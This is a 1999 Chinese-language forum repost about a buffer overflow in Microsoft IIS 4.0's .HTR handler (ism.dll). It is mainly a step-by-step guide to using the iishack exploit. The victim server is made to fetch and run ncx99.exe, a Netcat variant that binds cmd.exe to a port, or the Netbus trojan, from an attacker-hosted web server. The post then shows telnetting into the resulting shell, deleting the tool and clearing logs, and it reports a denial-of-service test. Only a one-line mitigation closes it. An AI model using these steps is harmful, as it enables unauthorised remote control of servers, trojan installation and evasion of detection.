精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>编程开发>>● ASP>>参考文档>>[转载] IIS4.0的一个漏洞

主题:[转载] IIS4.0的一个漏洞
发信人: nightcat()
整理人: nightcat(1999-07-12 11:10:26), 站内信件
【 以下文字转载自 Hacker 讨论区 】
【 原文由 绿叶 truely 所发表 】
这是十几天前被公开的微软Web服务器IIS4.0的一个漏洞,该漏洞允许入侵者任意
上载一个可执行文件到远端目标主机上并执行该文件,微软已经表示将尽快出一
个补丁。我对该漏洞进行了安全试验,结果没有上载成功(原因不明),但却成
功地当掉了目标机的Web发布服务,这又是一个袭击NT+IIS的拒绝服务攻击手段,
对NT4+SP4+IIS4.0是100%成功。微软,你惨了。
描述:IIS的ISAPI的毛病(*.HTR) ,在IIS的/Inetsrv目录下,有个DLL文件叫ism.
dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问
题到处出现.IIShack.asm ,利用这个毛病,eEye写了两个程序: iishack.exe ncx
99.exe,为达目的你必须自己有一个web server,把ncx99.exe和netbus木马传到这
个web server的目录下,比如你的web server是:www.mysvr.com 而对方的IIS se
rver是www.xxx.com 
则: iishack www.xxx.com 80 www.mysvr.com/ncx99.exe (注意,不要加http://
字符!) 
上述命令输入后这时你应该可以看到 
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- [email protected].
http://www.eEye.com
[usage: iishack <host> <port> <url> ]
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------
Data sent!

然后,再把一些破坏性程序如病毒、Netbus等特洛伊木马传到对方机器上去: 
iishack www.example.com 80 www.myserver.com/netbus.exe 
ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telne
t服务 
ncx.exe 这是较早的版本,是把端口绑到80的,由于80端口跑web服务,端口已经被
使用.所以可能不一定有效 
然后,用Telnet到对方的99或80端口: 
Telnet www.xxx.com 99 
结果是这样: 
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>[You have full access to the system, happy browsing :)]
C:\>[Add a scheduled task to restart inetinfo in X minutes]
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:\>[Clean up any trace or logs we might have left behind.]

这样,你就完全控制了其硬盘上的文件!注意,如果你type exit退出,对方server上
的这个进程也会退出 

补救方法:在IIS的www service属性中将主目录的应用程序设置的*.htr的映射删
除 
这是微软对这个问题的正式回应 。这是我收集到的ISS的反应和警告。




--
吾爱深谷之野花,未见其形则闻其香!! 
I think I do . I do I think
绿叶 Truely!!

※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.96.161.28]
--
※ 转载:.月光软件站 http://www.moon-soft.com.[FROM: 202.103.114.130]

[关闭][返回]